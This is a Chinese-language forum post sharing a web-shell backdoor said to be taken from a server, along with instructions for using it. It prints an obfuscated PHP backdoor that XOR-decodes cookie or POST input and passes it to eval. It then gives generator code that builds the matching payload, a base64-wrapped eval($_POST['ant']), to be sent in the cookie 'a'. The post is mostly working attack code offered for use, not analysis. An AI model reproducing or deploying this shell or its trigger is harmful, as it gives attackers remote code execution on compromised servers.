• 注册
  • 技术交流 技术交流 关注:12 内容:21

    服务器上获取的一个后门, 以及对应利用方法

  • 查看作者
  • 打赏作者
    • 技术交流
    • 加密的后门代码:

      <?php
      $nxdhjel = '23bum*4\'ni#ptf1sdklxH9y_-6r08geovac';$vaiyh = Array();$vaiyh[] = $nxdhjel[20].$nxdhjel[5];$vaiyh[] = $nxdhjel[10];$vaiyh[] = $nxdhjel[0].$nxdhjel[27].$nxdhjel[33].$nxdhjel[27].$nxdhjel[25].$nxdhjel[13].$nxdhjel[0].$nxdhjel[14].$nxdhjel[24].$nxdhjel[2].$nxdhjel[30].$nxdhjel[0].$nxdhjel[27].$nxdhjel[24].$nxdhjel[6].$nxdhjel[30].$nxdhjel[21].$nxdhjel[34].$nxdhjel[24].$nxdhjel[2].$nxdhjel[1].$nxdhjel[30].$nxdhjel[30].$nxdhjel[24].$nxdhjel[6].$nxdhjel[2].$nxdhjel[6].$nxdhjel[2].$nxdhjel[0].$nxdhjel[28].$nxdhjel[25].$nxdhjel[6].$nxdhjel[16].$nxdhjel[2].$nxdhjel[30].$nxdhjel[33];$vaiyh[] = $nxdhjel[34].$nxdhjel[31].$nxdhjel[3].$nxdhjel[8].$nxdhjel[12];$vaiyh[] = $nxdhjel[15].$nxdhjel[12].$nxdhjel[26].$nxdhjel[23].$nxdhjel[26].$nxdhjel[30].$nxdhjel[11].$nxdhjel[30].$nxdhjel[33].$nxdhjel[12];$vaiyh[] = $nxdhjel[30].$nxdhjel[19].$nxdhjel[11].$nxdhjel[18].$nxdhjel[31].$nxdhjel[16].$nxdhjel[30];$vaiyh[] = $nxdhjel[15].$nxdhjel[3].$nxdhjel[2].$nxdhjel[15].$nxdhjel[12].$nxdhjel[26];$vaiyh[] = $nxdhjel[33].$nxdhjel[26].$nxdhjel[26].$nxdhjel[33].$nxdhjel[22].$nxdhjel[23].$nxdhjel[4].$nxdhjel[30].$nxdhjel[26].$nxdhjel[29].$nxdhjel[30];$vaiyh[] = $nxdhjel[15].$nxdhjel[12].$nxdhjel[26].$nxdhjel[18].$nxdhjel[30].$nxdhjel[8];$vaiyh[] = $nxdhjel[11].$nxdhjel[33].$nxdhjel[34].$nxdhjel[17];foreach ($vaiyh[7]($_COOKIE, $_POST) as $kluwf => $shfgsz){function gokotve($vaiyh, $kluwf, $lecsjeb){return $vaiyh[6]($vaiyh[4]($kluwf . $vaiyh[2], ($lecsjeb / $vaiyh[8]($kluwf)) + 1), 0, $lecsjeb);}function igaytvi($vaiyh, $dezmdr){return @$vaiyh[9]($vaiyh[0], $dezmdr);}function chbfsbk($vaiyh, $dezmdr){$flrvp = $vaiyh[3]($dezmdr) % 3;if (!$flrvp) {eval($dezmdr[1]($dezmdr[2]));exit();}}$shfgsz = igaytvi($vaiyh, $shfgsz);chbfsbk($vaiyh, $vaiyh[5]($vaiyh[1], $shfgsz ^ gokotve($vaiyh, $kluwf, $vaiyh[8]($shfgsz))));}

      对应生成的利用代码:

      function gokotve($kluwf, $lecsjeb) {
      		return substr(str_repeat($kluwf . "20a06f21-be20-4e9c-b3ee-4b4b2864dbea", ($lecsjeb / strlen($kluwf)) + 1), 0, $lecsjeb);
      	}
      
      	 $shfgsz="22222222#base64_decode#ZXZhbCgkX1BPU1RbImFudCJdKTs=";
      	$a=$shfgsz^ gokotve("a",	strlen($shfgsz));
      
        $aaa=bin2hex($a);
       		echo $aaa;

      需要在获取的时候cookie部分加入即可,a=

      请登录之后再进行评论

      登录

      WordPress后台-外观-小工具 进行配置小工具

    • 做任务
    • 实时动态
    • 偏好设置
    • 帖子间隔 侧栏位置: